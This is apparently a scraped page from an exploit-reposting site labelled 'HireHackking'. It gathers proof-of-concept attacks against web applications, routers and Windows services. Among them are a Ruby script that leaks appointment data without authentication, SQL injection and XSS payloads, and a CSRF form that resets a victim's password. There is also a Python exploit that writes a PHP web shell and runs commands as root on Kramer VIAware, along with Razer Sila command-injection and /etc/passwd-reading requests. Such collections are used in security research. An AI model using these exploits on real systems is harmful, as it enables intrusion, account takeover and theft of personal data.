# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure # Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) # Author website: https://pwn.by/noraj/ # Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482 # Date: 2022-04-11 # Vendor Homepage: https://easyappointments.org/ # Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz # Version: < 1.4.3 (it means up to 1.4.2) # Tested on: Easy!Appointments Version 1.3.2 # Vulnerability ## Discoverer: Francesco CARLUCCI ## Date: 2022-01-30 ## Discoverer website: https://carluc.ci/ ## Discovered on OpenNetAdmin 1.4.2 ## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments ## CVE: CVE-2022-0482 ## CWE: CWE-863 ## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c ## References: ## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ ## - https://github.com/alextselegidis/easyappointments/tree/1.4.2 ## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml ## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ ## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 #!/usr/bin/env ruby require 'date' require 'httpx' require 'docopt' doc = <<~DOCOPT Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure Source: https://github.com/Acceis/exploit-CVE-2022-0482 Usage: #{__FILE__} <url> [<startDate> <endDate>] [--debug] #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <startDate> All events since (default: 2015-01-11) <endDate> All events until (default: today) --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} http://10.0.0.1 #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30 DOCOPT def fetch_csrf(root_url, http) vuln_url = "#{root_url}/index.php" http.get(vuln_url) end def exploit(root_url, startDate, endDate, http) vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events" params = { 'csrfToken' => http.cookies.first.value, # csrfCookie 'startDate' => startDate.nil? ? '2015-01-11' : startDate, 'endDate' => endDate.nil? ? Date.today.to_s : endDate } http.post(vuln_url, form: params) end begin args = Docopt.docopt(doc) pp args if args['--debug'] http = HTTPX.plugin(:cookies) fetch_csrf(args['<url>'], http) puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body rescue Docopt::Exit => e puts e.message end
HireHackking

KLiK Social Media Website 1.0 - 'Multiple' SQLi

HACKER · %s · %s

# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi # Date: April 1st, 2022 # Exploit Author: corpse # Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Version: 1.0 # Tested on: Debian 11 Parameter: poll (GET) Type: time-based blind Title: MySQL time-based blind - Parameter replace (ELT) Payload: poll=ELT(1079=1079,SLEEP(5)) Parameter: pollID (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS) Parameter: voteOpt (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15
HireHackking

minewebcms 1.15.2 - Cross-site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS) # Google Dork: NA # Date: 02/20/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://mineweb.org/ # Software Link: https://github.com/mineweb/minewebcms # Version: 1.15.2 # Tested on: KALI OS # CVE : CVE-2022-1163 # --------------- Steps to Reproduce:- => Install the WebApp and Setup it => Login in to webAPP using Admin Creds. => Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar" => Add/Edit a Link Select "Drop-Down Menu" => "Link Name" and "URL" Both Input are Vulnerable to Exploit Simple XSS => Payload : <script>alert(1);</script> => XSS will trigger on "http://localhost/MineWebCMS-1.15.2/" Aka WebApp HOME Page Note : As you can see this simple payload working in those two inputs as normally . Whole WebApp Admin Input Structure is allow to do HTML Injection or XSS Injection References: https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/
HireHackking

Kramer VIAware - Remote Code Execution (RCE) (Root)

HACKER · %s · %s

# Exploit Title: Remote Code Execution as Root on KRAMER VIAware # Date: 31/03/2022 # Exploit Author: sharkmoos # Vendor Homepage: https://www.kramerav.com/ # Software Link: https://www.kramerav.com/us/product/viaware # Version: * # Tested on: ViaWare Go (Linux) # CVE : CVE-2021-35064, CVE-2021-36356 import sys, urllib3 from requests import get, post urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def writeFile(host): headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html, */*", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } # write php web shell into the Apache web directory data = { "radioBtnVal":"""<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); }?>""", "associateFileName": "/var/www/html/test.php"} post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False) def getResult(host, cmd): # query the web shell, using rpm as sudo for root privileges file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False) pageText = file.text if len(pageText) < 1: result = "Command did not return a result" else: result = pageText return result def main(host): # upload malicious php writeFile(host) command = "" while command != "exit": # repeatedly query the webshell command = input("cmd:> ").strip() print(getResult(host, command)) exit() if __name__ == "__main__": if len(sys.argv) == 2: main(sys.argv[1]) else: print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")
HireHackking

qdPM 9.2 - Cross-site Request Forgery (CSRF)

HACKER · %s · %s

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF) # Google Dork: NA # Date: 03/27/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://qdpm.net/ # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download # Version: 9.2 # Tested on: KALI OS # CVE : CVE-2022-26180 # --------------- Steps to Exploit : 1) Make an HTML file of given POC (Change UserID field Accordingly)and host it. 2) send it to victim. <html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title> <body> <script>history.pushState('', '', '/')</script> <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST"> <input type="hidden" name="sf&#95;method" value="put" /> <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly ---> <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" /> <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" /> <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" /> <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" /> <input type="hidden" name="users&#91;photo&#93;" value="" /> <input type="hidden" name="users&#91;culture&#93;" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking

binutils 2.37 - Objdump Segmentation Fault

HACKER · %s · %s

# Exploit Title: binutils 2.37 - Objdump Segmentation Fault # Date: 2021-11-03 # Exploit Author: p3tryx # Vendor Homepage: https://www.gnu.org/software/binutils/ # Version: binutils 2.37 # Tested on: Ubuntu 18.04 # CVE : CVE-2021-43149 Payload file ``` %223"\972\00\0083=Q333A111111114111113333<33A $$$\FF)$\80 1114 \00\80\99\00111111111111111-11111111111111111111111111111111111'111111111111111111 111111*111111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111 $%22622FF7FFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22111111111111111111111111111111111.1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101111111111111111111111111111111111111111111111111111111111111111111111111111622FF \00\00\00FFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF111111111111111111111111111111111111111111111111111111q1111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFDFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF11111111111111111,1FF\83 \81 \8D 1111 $%22622FF7FFFFFFFFFFFFFFF \FF \00\80\99\00 1))\FF)$\80 1114 \00\80\99\0011111111111111)111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 { \8D 1111 $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%2262211111111111111111111111111111111111111111111\00\00 \00111111111111111111111111111111111111111111111FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 111 $%22622FFF1111111111111111111FF\83))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF2E2CF9FFFF \98 \81 \8D 1111 $%22622FF7FFFFFFFFF1111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF1111111111111111111FF\83 \81 \8D 1111 $%22622FF7FFFFFFFFFFFFFFF \FF \00\80\99 1))\FF)$\80 1114 \00\80\99\00111111111111111111111111111111111111111111111111111'111111111111111111 1111111111111111111111111111111>11111111111d\00\00\00111111111111111111 111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111\EA111111111111111 $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1 1111 $%22622FFFFFFF1111111111111111111111111111\BF\BF\BF\BF\BF\BF1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!11111111111111'111111111111111111 111111111111@111111111111111111d\001111 \0011111111111111111111111111111111111111111111111*1111111111111111111111111111111111111111111111111111111111110111111111151111111111111111111111111111111111111111111111111111)111111111111111111111111111F111111111111111111111111 1111111FFFFFFFFFFLFFFFFFF11111111 111111111111111111111111111111111 $%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111P1111111111111111111111111111111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111N1111111111111111111111111111111111111111111111111 1111111111111111111111111111\FF\FF1111111117111111111111111111111111111111111))\FF)$11111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111111111111111111111111111111111111111@1111111111111111111111111111111111111111111111111111\00\00 \0011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111M111111R111111111111 111111111111 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 1))\FF)$1 1I11 $%22622FFFFFF1FFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF111111111111 111111111111111111111111111111111111111111111 1))\FF)$1 1111 $%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF$%22622FFFFFFFFFFFFFMFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111 $%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111FFFFFF \FF \00\80\99\00 1))\FF)$\80 1111 \00\80\99\00a1))\FF)$1 1J11 $%22@22FF11111FFFFFFFFFFFFFF222$)$ ``` RUN the POC # binutils-2.37/binutils/objdump -T -D -x crash_2.37 ASAN:SIGSEGV ================================================================= ==27705==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38 T0) ==27705==Hint: pc points to the zero page. AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==27705==ABORTING
HireHackking

MiniTool Partition Wizard - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path # Date: 07/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.0 # Tested: Windows 10 Pro x64 es # PoC : C:\Users\saudh>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe" C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files
HireHackking

Razer Sila - Command Injection

HACKER · %s · %s

# Exploit Title: Razer Sila - Command Injection # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 85 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]} # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 172 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
HireHackking

Telesquare TLR-2855KS6 - Arbitrary File Deletion

HACKER · %s · %s

# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.telesquare.co.kr/ # Version: TLR-2855KS6 # Tested on: Linux [Firefox] # CVE : CVE-2021-46419 # Proof of Concept DELETE /cgi-bin/test.cgi HTTP/1.1 Host: 192.168.1.5 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 438 Origin: http://192.168.1.5 DNT: 1 Connection: close Referer: http://192.168.1.5/ Cookie: nonce=16426923592222
HireHackking

Razer Sila - Local File Inclusion (LFI)

HACKER · %s · %s

# Exploit Title: Razer Sila - Local File Inclusion (LFI) # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 123 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} # Reponse HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 537 {"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}
HireHackking
# Exploit Title: Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-04-11 # Vendor : Microsoft # Version : 15.0.847.40 # Tested on OS: Microsoft Exchange Server 2013 SP1 #PoC : ============== C:\>sc qc MSExchangeADTopology [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeADTopology TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology DIPENDENZE : SERVICE_START_NAME : LocalSystem